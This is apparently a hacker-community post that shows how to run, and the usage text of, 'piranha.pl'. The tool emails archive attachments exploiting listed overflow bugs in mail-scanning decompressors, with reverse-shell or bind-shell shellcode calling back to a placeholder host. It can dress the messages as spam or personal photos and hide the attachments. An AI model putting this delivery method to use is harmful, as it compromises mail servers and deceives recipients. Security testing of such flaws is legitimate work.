Send some Christmas cards:
$ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a myname@mydomain.com
Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]
Mandatory arguments:
-e+ Exploit number to use (See below)
-h+ SMTP server to test
-a+ Destination email address used in probing
Optional arguments:
-s+ Shellcode type to inject into exploits (See below)
-c+ Cloaking style (See below)
-d+ Try to vanish attachments from MUA's view (See below)
-v Attach EICAR virus to improve stealthness
-z Pack all the malware into a tarball to be less noisy
-p+ Port to use in reverse shell or bind shell
-l+ Host to connect back in reverse shell mode
Valid exploits numbers:
0 OSVDB #5753: LHA get_header File Name Overflow
1 OSVDB #5754: LHA get_header Directory Name Overflow
2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
3 OSVDB #11695: unarj Filename Handling Overflow
4 OSVDB #23460: ZOO combine File and Dir name overflow
5 OSVDB #15867: Convert UUlib uunconc integer overflow
6 OSVDB #XXX: ZOO next offset infinite loop DoS
Valid shellcode types:
0 TCP reverse shell
1 UDP reverse shell
2 TCP bind shell
Valid cloaking styles (consult whitepaper for visual result):
0 No cloaking at all (default)
1 Viagra spam message
2 "Look at the pictures I promised you!"
Vanishing techniques for attachments:
0 No vanishing at all (default)
1 Multipart/alternative trick
2 <img src="image.JPG" width=0 height=0> trick
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | hackfest.obnosis.com (503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or take the Blue [XP/Vista Update] Pill & stay happily ignorant.
http://uncyclopedia.wikia.com/wiki/Satan_Claus